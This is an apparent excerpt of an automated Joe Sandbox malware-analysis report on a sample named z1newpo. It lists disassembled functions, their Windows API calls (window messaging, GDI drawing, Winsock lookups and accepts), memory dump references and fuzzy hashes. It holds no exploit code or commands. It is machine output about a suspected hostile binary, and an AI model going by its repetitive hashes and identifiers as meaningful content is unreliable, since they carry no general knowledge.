                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                    • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                    • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                    • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                    Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                      • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                      • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                    • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                    • String ID: cdecl
                                                    • API String ID: 3850814276-3896280584
                                                    • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                    • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                    • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                    • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                    Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                    • _memmove.LIBCMT ref: 0046D475
                                                    • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 2502553879-0
                                                    • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                    • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                    • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                    • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                    Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32 ref: 00448C69
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                    • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                    • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                    • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                    Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastacceptselect
                                                    • String ID:
                                                    • API String ID: 385091864-0
                                                    • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                    • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                    • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                    • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                    Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                    • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                    • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                    • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                    Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                    • GetStockObject.GDI32(00000011), ref: 00430258
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                    • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                    • String ID:
                                                    • API String ID: 1358664141-0
                                                    • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                    • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                    • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                    • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                    Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                    • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                    • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                    • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                    • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                    Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                    • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                    • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                    • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                    • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                    • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                    Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 0043392E
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • __wsplitpath.LIBCMT ref: 00433950
                                                    • __wcsicoll.LIBCMT ref: 00433974
                                                    • __wcsicoll.LIBCMT ref: 0043398A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                    • String ID:
                                                    • API String ID: 1187119602-0
                                                    • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                    • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                    • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                    • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                    Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                    • String ID:
                                                    • API String ID: 1597257046-0
                                                    • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                    • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                    • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                    • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                    Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                    • __malloc_crt.LIBCMT ref: 0041F5B6
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                    • String ID:
                                                    • API String ID: 237123855-0
                                                    • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                    • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                    • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                    • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                    Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyObject$IconWindow
                                                    • String ID:
                                                    • API String ID: 3349847261-0
                                                    • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                    • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                    • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                    • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                    Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                    • String ID:
                                                    • API String ID: 2223660684-0
                                                    • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                    • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                    • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                    • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                    Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                    • LineTo.GDI32(?,?,?), ref: 00447326
                                                    • EndPath.GDI32(?), ref: 00447336
                                                    • StrokePath.GDI32(?), ref: 00447344
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 2783949968-0
                                                    • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                    • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                    • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                    • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
